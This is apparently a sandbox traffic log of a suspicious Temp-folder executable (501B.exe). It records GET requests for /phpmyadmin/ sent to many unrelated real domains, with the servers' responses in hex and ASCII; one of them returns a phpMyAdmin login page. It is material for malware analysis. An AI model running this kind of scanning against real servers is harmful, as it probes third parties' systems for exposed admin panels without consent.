                                                                                                                                                                                                                                                                                                                2023-12-02 01:09:25 UTC315INData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 34
                                                                                                                                                                                                                                                                                                                Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Not Found</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Not Found</h2><hr><p>HTTP Error 404


                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                16192.168.2.651434195.68.234.2524433492C:\Users\user\AppData\Local\Temp\501B.exe
                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                2023-12-02 01:09:25 UTC173OUTGET /phpmyadmin/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                Host: pfprojekt.sk
                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                2023-12-02 01:09:25 UTC145INData Raw: 48 54 54 50 2f 31 2e 31 20 34 30 33 20 46 6f 72 62 69 64 64 65 6e 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68 74 6d 6c 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 33 30 32 0d 0a 44 61 74 65 3a 20 53 61 74 2c 20 30 32 20 44 65 63 20 32 30 32 33 20 30 31 3a 30 39 3a 31 31 20 47 4d 54 0d 0a 53 65 72 76 65 72 3a 20 30 2e 30 2e 30 2e 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                Data Ascii: HTTP/1.1 403 ForbiddenContent-Type: text/htmlConnection: closeContent-Length: 302Date: Sat, 02 Dec 2023 01:09:11 GMTServer: 0.0.0.0
                                                                                                                                                                                                                                                                                                                2023-12-02 01:09:25 UTC302INData Raw: 3c 68 74 6d 6c 3e 3c 62 6f 64 79 3e 3c 64 69 76 20 69 64 3d 22 68 65 61 64 65 72 22 3e 3c 68 31 3e 53 65 72 76 65 72 20 45 72 72 6f 72 3c 2f 68 31 3e 3c 2f 64 69 76 3e 3c 64 69 76 20 69 64 3d 22 63 6f 6e 74 65 6e 74 22 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 65 6e 74 2d 63 6f 6e 74 61 69 6e 65 72 22 3e 3c 66 69 65 6c 64 73 65 74 3e 3c 68 32 3e 34 30 33 20 2d 20 46 6f 72 62 69 64 64 65 6e 3a 20 41 63 63 65 73 73 20 69 73 20 64 65 6e 69 65 64 2e 3c 2f 68 32 3e 3c 68 33 3e 59 6f 75 20 64 6f 20 6e 6f 74 20 68 61 76 65 20 70 65 72 6d 69 73 73 69 6f 6e 20 74 6f 20 76 69 65 77 20 74 68 69 73 20 64 69 72 65 63 74 6f 72 79 20 6f 72 20 70 61 67 65 20 75 73 69 6e 67 20 74 68 65 20 63 72 65 64 65 6e 74 69 61 6c 73 20 74 68 61 74 20 79 6f 75 20 73 75 70 70
                                                                                                                                                                                                                                                                                                                Data Ascii: <html><body><div id="header"><h1>Server Error</h1></div><div id="content"><div class="content-container"><fieldset><h2>403 - Forbidden: Access is denied.</h2><h3>You do not have permission to view this directory or page using the credentials that you supp


                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                17192.168.2.6514563.64.163.504433492C:\Users\user\AppData\Local\Temp\501B.exe
                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                2023-12-02 01:09:25 UTC174OUTGET /phpmyadmin/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                Host: la-morada.com
                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                2023-12-02 01:09:25 UTC149INData Raw: 48 54 54 50 2f 31 2e 31 20 34 31 30 20 47 6f 6e 65 0d 0a 53 65 72 76 65 72 3a 20 6f 70 65 6e 72 65 73 74 79 0d 0a 44 61 74 65 3a 20 53 61 74 2c 20 30 32 20 44 65 63 20 32 30 32 33 20 30 31 3a 30 39 3a 32 35 20 47 4d 54 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68 74 6d 6c 0d 0a 54 72 61 6e 73 66 65 72 2d 45 6e 63 6f 64 69 6e 67 3a 20 63 68 75 6e 6b 65 64 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                Data Ascii: HTTP/1.1 410 GoneServer: openrestyDate: Sat, 02 Dec 2023 01:09:25 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: close
                                                                                                                                                                                                                                                                                                                2023-12-02 01:09:25 UTC139INData Raw: 37 0d 0a 3c 68 74 6d 6c 3e 0a 0d 0a 39 0d 0a 20 20 3c 68 65 61 64 3e 0a 0d 0a 34 61 0d 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 27 72 65 66 72 65 73 68 27 20 63 6f 6e 74 65 6e 74 3d 27 30 3b 20 75 72 6c 3d 68 74 74 70 73 3a 2f 2f 6c 61 2d 6d 6f 72 61 64 61 2e 63 6f 6d 2f 27 20 2f 3e 0a 0d 0a 61 0d 0a 20 20 3c 2f 68 65 61 64 3e 0a 0d 0a 38 0d 0a 3c 2f 68 74 6d 6c 3e 0a 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                Data Ascii: 7<html>9 <head>4a <meta http-equiv='refresh' content='0; url=https://la-morada.com/' />a </head>8</html>0


                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                18192.168.2.652087178.172.160.19443
                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                2023-12-02 01:09:25 UTC167OUTGET /phpmyadmin/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                Host: ext.by
                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                2023-12-02 01:09:26 UTC221INData Raw: 48 54 54 50 2f 31 2e 31 20 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 0d 0a 44 61 74 65 3a 20 53 61 74 2c 20 30 32 20 44 65 63 20 32 30 32 33 20 30 31 3a 30 39 3a 31 35 20 47 4d 54 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68 74 6d 6c 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 31 36 39 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 4c 6f 63 61 74 69 6f 6e 3a 20 68 74 74 70 73 3a 2f 2f 68 6f 73 74 65 72 2e 62 79 2f 0d 0a 53 65 72 76 65 72 3a 20 68 6f 73 74 65 72 20 47 75 61 72 64 0d 0a 58 2d 43 6f 6e 74 65 6e 74 2d 54 79 70 65 2d 4f 70 74 69 6f 6e 73 3a 20 6e 6f 73 6e 69 66 66 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                Data Ascii: HTTP/1.1 301 Moved PermanentlyDate: Sat, 02 Dec 2023 01:09:15 GMTContent-Type: text/htmlContent-Length: 169Connection: closeLocation: https://hoster.by/Server: hoster GuardX-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                                                2023-12-02 01:09:26 UTC169INData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 32 34 2e 30 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                                                                                                                                Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx/1.24.0</center></body></html>


                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                19192.168.2.651948188.120.236.18443
                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                2023-12-02 01:09:26 UTC172OUTGET /phpmyadmin/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                Host: eremina.net
                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                2023-12-02 01:09:26 UTC179INData Raw: 48 54 54 50 2f 31 2e 31 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68 74 6d 6c 0d 0a 53 65 72 76 65 72 3a 20 4d 69 63 72 6f 73 6f 66 74 2d 49 49 53 2f 38 2e 35 0d 0a 58 2d 50 6f 77 65 72 65 64 2d 42 79 3a 20 41 53 50 2e 4e 45 54 0d 0a 44 61 74 65 3a 20 46 72 69 2c 20 30 31 20 44 65 63 20 32 30 32 33 20 32 32 3a 30 39 3a 32 34 20 47 4d 54 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 31 32 34 35 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                Data Ascii: HTTP/1.1 404 Not FoundContent-Type: text/htmlServer: Microsoft-IIS/8.5X-Powered-By: ASP.NETDate: Fri, 01 Dec 2023 22:09:24 GMTConnection: closeContent-Length: 1245
                                                                                                                                                                                                                                                                                                                2023-12-02 01:09:26 UTC1245INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 69 73 6f 2d 38 38 35 39 2d 31 22 2f 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 2d 20 46 69 6c
                                                                                                                                                                                                                                                                                                                Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/><title>404 - Fil


                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                20192.168.2.65170566.96.160.144443
                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                2023-12-02 01:09:26 UTC180OUTGET /phpmyadmin/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                Host: jumpnsplashwear.com
                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                2023-12-02 01:09:26 UTC222INData Raw: 48 54 54 50 2f 31 2e 31 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 44 61 74 65 3a 20 53 61 74 2c 20 30 32 20 44 65 63 20 32 30 32 33 20 30 31 3a 30 39 3a 32 36 20 47 4d 54 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68 74 6d 6c 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 38 36 37 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 53 65 72 76 65 72 3a 20 41 70 61 63 68 65 2f 32 0d 0a 4c 61 73 74 2d 4d 6f 64 69 66 69 65 64 3a 20 46 72 69 2c 20 31 30 20 4a 61 6e 20 32 30 32 30 20 31 36 3a 30 35 3a 31 30 20 47 4d 54 0d 0a 41 63 63 65 70 74 2d 52 61 6e 67 65 73 3a 20 62 79 74 65 73 0d 0a 41 67 65 3a 20 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                Data Ascii: HTTP/1.1 404 Not FoundDate: Sat, 02 Dec 2023 01:09:26 GMTContent-Type: text/htmlContent-Length: 867Connection: closeServer: Apache/2Last-Modified: Fri, 10 Jan 2020 16:05:10 GMTAccept-Ranges: bytesAge: 0
                                                                                                                                                                                                                                                                                                                2023-12-02 01:09:26 UTC867INData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 3e 0d 0a 3c 68 74 6d 6c 3e 0d 0a 0d 0a 20 20 20 20 3c 68 65 61 64 3e 0d 0a 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 45 72 72 6f 72 20 2d 20 50 61 67 65 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 20 20 20 20 20 20 20 20 3c 73 74 79 6c 65 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 23 61 64 5f 66 72 61 6d 65 7b 20 68 65 69 67 68 74 3a 38 30 30 70 78 3b 20 77 69 64 74 68 3a 31 30 30 25 3b 20 7d 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 6f 64 79 7b 20 6d 61 72 67 69 6e 3a 30 3b 20 62 6f 72 64 65 72 3a 20 30 3b 20 70 61 64 64 69 6e 67 3a 20 30 3b 20 7d 0d 0a 20 20 20 20 20 20 20 20 3c 2f 73 74 79 6c 65 3e 0d 0a 20 20 20 20 20 20 20 20 3c 73 63 72 69 70 74 20 73 72 63 3d 22 2f 2f 61
                                                                                                                                                                                                                                                                                                                Data Ascii: <!DOCTYPE HTML><html> <head> <title>404 Error - Page Not Found</title> <style> #ad_frame{ height:800px; width:100%; } body{ margin:0; border: 0; padding: 0; } </style> <script src="//a


                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                21192.168.2.65209366.96.160.144443
                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                2023-12-02 01:09:26 UTC180OUTGET /phpmyadmin/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                Host: jumpnsplashwear.com
                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                2023-12-02 01:09:26 UTC262INData Raw: 48 54 54 50 2f 31 2e 31 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 44 61 74 65 3a 20 53 61 74 2c 20 30 32 20 44 65 63 20 32 30 32 33 20 30 31 3a 30 39 3a 32 36 20 47 4d 54 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68 74 6d 6c 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 38 36 37 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 53 65 72 76 65 72 3a 20 41 70 61 63 68 65 2f 32 0d 0a 4c 61 73 74 2d 4d 6f 64 69 66 69 65 64 3a 20 46 72 69 2c 20 31 30 20 4a 61 6e 20 32 30 32 30 20 31 36 3a 30 35 3a 31 30 20 47 4d 54 0d 0a 41 63 63 65 70 74 2d 52 61 6e 67 65 73 3a 20 62 79 74 65 73 0d 0a 45 78 70 69 72 65 73 3a 20 53 61 74 2c 20 30 32 20 44 65 63 20 32 30 32 33 20 30 31 3a 30 39 3a 33 36 20 47 4d 54 0d 0a 41 67 65
                                                                                                                                                                                                                                                                                                                Data Ascii: HTTP/1.1 404 Not FoundDate: Sat, 02 Dec 2023 01:09:26 GMTContent-Type: text/htmlContent-Length: 867Connection: closeServer: Apache/2Last-Modified: Fri, 10 Jan 2020 16:05:10 GMTAccept-Ranges: bytesExpires: Sat, 02 Dec 2023 01:09:36 GMTAge
                                                                                                                                                                                                                                                                                                                2023-12-02 01:09:26 UTC867INData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 3e 0d 0a 3c 68 74 6d 6c 3e 0d 0a 0d 0a 20 20 20 20 3c 68 65 61 64 3e 0d 0a 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 45 72 72 6f 72 20 2d 20 50 61 67 65 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 20 20 20 20 20 20 20 20 3c 73 74 79 6c 65 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 23 61 64 5f 66 72 61 6d 65 7b 20 68 65 69 67 68 74 3a 38 30 30 70 78 3b 20 77 69 64 74 68 3a 31 30 30 25 3b 20 7d 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 6f 64 79 7b 20 6d 61 72 67 69 6e 3a 30 3b 20 62 6f 72 64 65 72 3a 20 30 3b 20 70 61 64 64 69 6e 67 3a 20 30 3b 20 7d 0d 0a 20 20 20 20 20 20 20 20 3c 2f 73 74 79 6c 65 3e 0d 0a 20 20 20 20 20 20 20 20 3c 73 63 72 69 70 74 20 73 72 63 3d 22 2f 2f 61
                                                                                                                                                                                                                                                                                                                Data Ascii: <!DOCTYPE HTML><html> <head> <title>404 Error - Page Not Found</title> <style> #ad_frame{ height:800px; width:100%; } body{ margin:0; border: 0; padding: 0; } </style> <script src="//a


                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                22192.168.2.653491172.67.204.29443
                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                2023-12-02 01:09:26 UTC173OUTGET /phpMyAdmin/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                Host: khodyari.com
                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                2023-12-02 01:09:29 UTC1353INData Raw: 48 54 54 50 2f 31 2e 31 20 32 30 30 20 4f 4b 0d 0a 44 61 74 65 3a 20 53 61 74 2c 20 30 32 20 44 65 63 20 32 30 32 33 20 30 31 3a 30 39 3a 32 39 20 47 4d 54 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 0d 0a 54 72 61 6e 73 66 65 72 2d 45 6e 63 6f 64 69 6e 67 3a 20 63 68 75 6e 6b 65 64 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 78 2d 6f 62 5f 6d 6f 64 65 3a 20 30 0d 0a 78 2d 66 72 61 6d 65 2d 6f 70 74 69 6f 6e 73 3a 20 44 45 4e 59 0d 0a 72 65 66 65 72 72 65 72 2d 70 6f 6c 69 63 79 3a 20 6e 6f 2d 72 65 66 65 72 72 65 72 0d 0a 63 6f 6e 74 65 6e 74 2d 73 65 63 75 72 69 74 79 2d 70 6f 6c 69 63 79 3a 20 64 65 66 61 75 6c 74 2d 73 72 63 20 27 73 65 6c 66 27 20 3b 73 63
                                                                                                                                                                                                                                                                                                                Data Ascii: HTTP/1.1 200 OKDate: Sat, 02 Dec 2023 01:09:29 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closex-ob_mode: 0x-frame-options: DENYreferrer-policy: no-referrercontent-security-policy: default-src 'self' ;sc
                                                                                                                                                                                                                                                                                                                2023-12-02 01:09:29 UTC477INData Raw: 6c 61 73 74 2d 6d 6f 64 69 66 69 65 64 3a 20 53 61 74 2c 20 30 32 20 44 65 63 20 32 30 32 33 20 30 31 3a 30 39 3a 32 38 20 47 4d 54 0d 0a 43 46 2d 43 61 63 68 65 2d 53 74 61 74 75 73 3a 20 44 59 4e 41 4d 49 43 0d 0a 52 65 70 6f 72 74 2d 54 6f 3a 20 7b 22 65 6e 64 70 6f 69 6e 74 73 22 3a 5b 7b 22 75 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 61 2e 6e 65 6c 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 5c 2f 72 65 70 6f 72 74 5c 2f 76 33 3f 73 3d 49 51 7a 75 25 32 46 57 4d 31 72 54 48 65 51 35 51 30 35 67 30 50 63 44 37 7a 42 57 64 66 34 38 6f 66 52 25 32 46 59 51 66 69 6b 31 75 49 77 7a 32 57 6c 4a 5a 4b 48 52 78 54 4f 74 36 38 65 76 74 4b 47 43 56 25 32 46 7a 72 71 44 42 4c 48 64 7a 73 48 78 58 7a 6b 41 39 34 6c 42 54 7a 30 6f 52 47 64 43 53 66 64 4f 53
                                                                                                                                                                                                                                                                                                                Data Ascii: last-modified: Sat, 02 Dec 2023 01:09:28 GMTCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=IQzu%2FWM1rTHeQ5Q05g0PcD7zBWdf48ofR%2FYQfik1uIwz2WlJZKHRxTOt68evtKGCV%2FzrqDBLHdzsHxXzkA94lBTz0oRGdCSfdOS
                                                                                                                                                                                                                                                                                                                2023-12-02 01:09:29 UTC1369INData Raw: 34 31 37 36 0d 0a 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 22 6c 74 72 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 65 66 65 72 72 65 72 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 72 65 66 65 72 72 65 72 22 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 6e 6f 66 6f 6c 6c 6f 77 2c 6e 6f 74 72 61 6e 73 6c 61 74 65 22 3e 0a 3c 6d
                                                                                                                                                                                                                                                                                                                Data Ascii: 4176<!doctype html><html lang="en" dir="ltr"><head><meta charset="utf-8"><meta name="viewport" content="width=device-width, initial-scale=1"><meta name="referrer" content="no-referrer"><meta name="robots" content="noindex,nofollow,notranslate"><m
                                                                                                                                                                                                                                                                                                                2023-12-02 01:09:29 UTC1369INData Raw: 74 3e 0a 3c 73 63 72 69 70 74 20 64 61 74 61 2d 63 66 61 73 79 6e 63 3d 22 66 61 6c 73 65 22 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 6a 73 2f 64 69 73 74 2f 6b 65 79 68 61 6e 64 6c 65 72 2e 6a 73 3f 76 3d 35 2e 32 2e 31 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 63 72 69 70 74 20 64 61 74 61 2d 63 66 61 73 79 6e 63 3d 22 66 61 6c 73 65 22 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 6a 73 2f 76 65 6e 64 6f 72 2f 6a 71 75 65 72 79 2f 6a 71 75 65 72 79 2d 75 69 2e 6d 69 6e 2e 6a 73 3f 76 3d 35 2e 32 2e 31 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 63 72 69 70 74 20 64 61 74 61 2d 63 66 61 73 79 6e 63 3d 22 66 61 6c 73 65 22 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61
                                                                                                                                                                                                                                                                                                                Data Ascii: t><script data-cfasync="false" type="text/javascript" src="js/dist/keyhandler.js?v=5.2.1"></script><script data-cfasync="false" type="text/javascript" src="js/vendor/jquery/jquery-ui.min.js?v=5.2.1"></script><script data-cfasync="false" type="text/java
                                                                                                                                                                                                                                                                                                                2023-12-02 01:09:29 UTC1369INData Raw: 2f 64 6f 63 6c 69 6e 6b 73 2e 6a 73 3f 76 3d 35 2e 32 2e 31 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 63 72 69 70 74 20 64 61 74 61 2d 63 66 61 73 79 6e 63 3d 22 66 61 6c 73 65 22 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 6a 73 2f 64 69 73 74 2f 66 75 6e 63 74 69 6f 6e 73 2e 6a 73 3f 76 3d 35 2e 32 2e 31 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 63 72 69 70 74 20 64 61 74 61 2d 63 66 61 73 79 6e 63 3d 22 66 61 6c 73 65 22 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 6a 73 2f 64 69 73 74 2f 6e 61 76 69 67 61 74 69 6f 6e 2e 6a 73 3f 76 3d 35 2e 32 2e 31 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 63 72 69 70 74 20 64 61 74 61 2d 63 66 61 73 79 6e 63 3d 22 66 61 6c 73 65 22
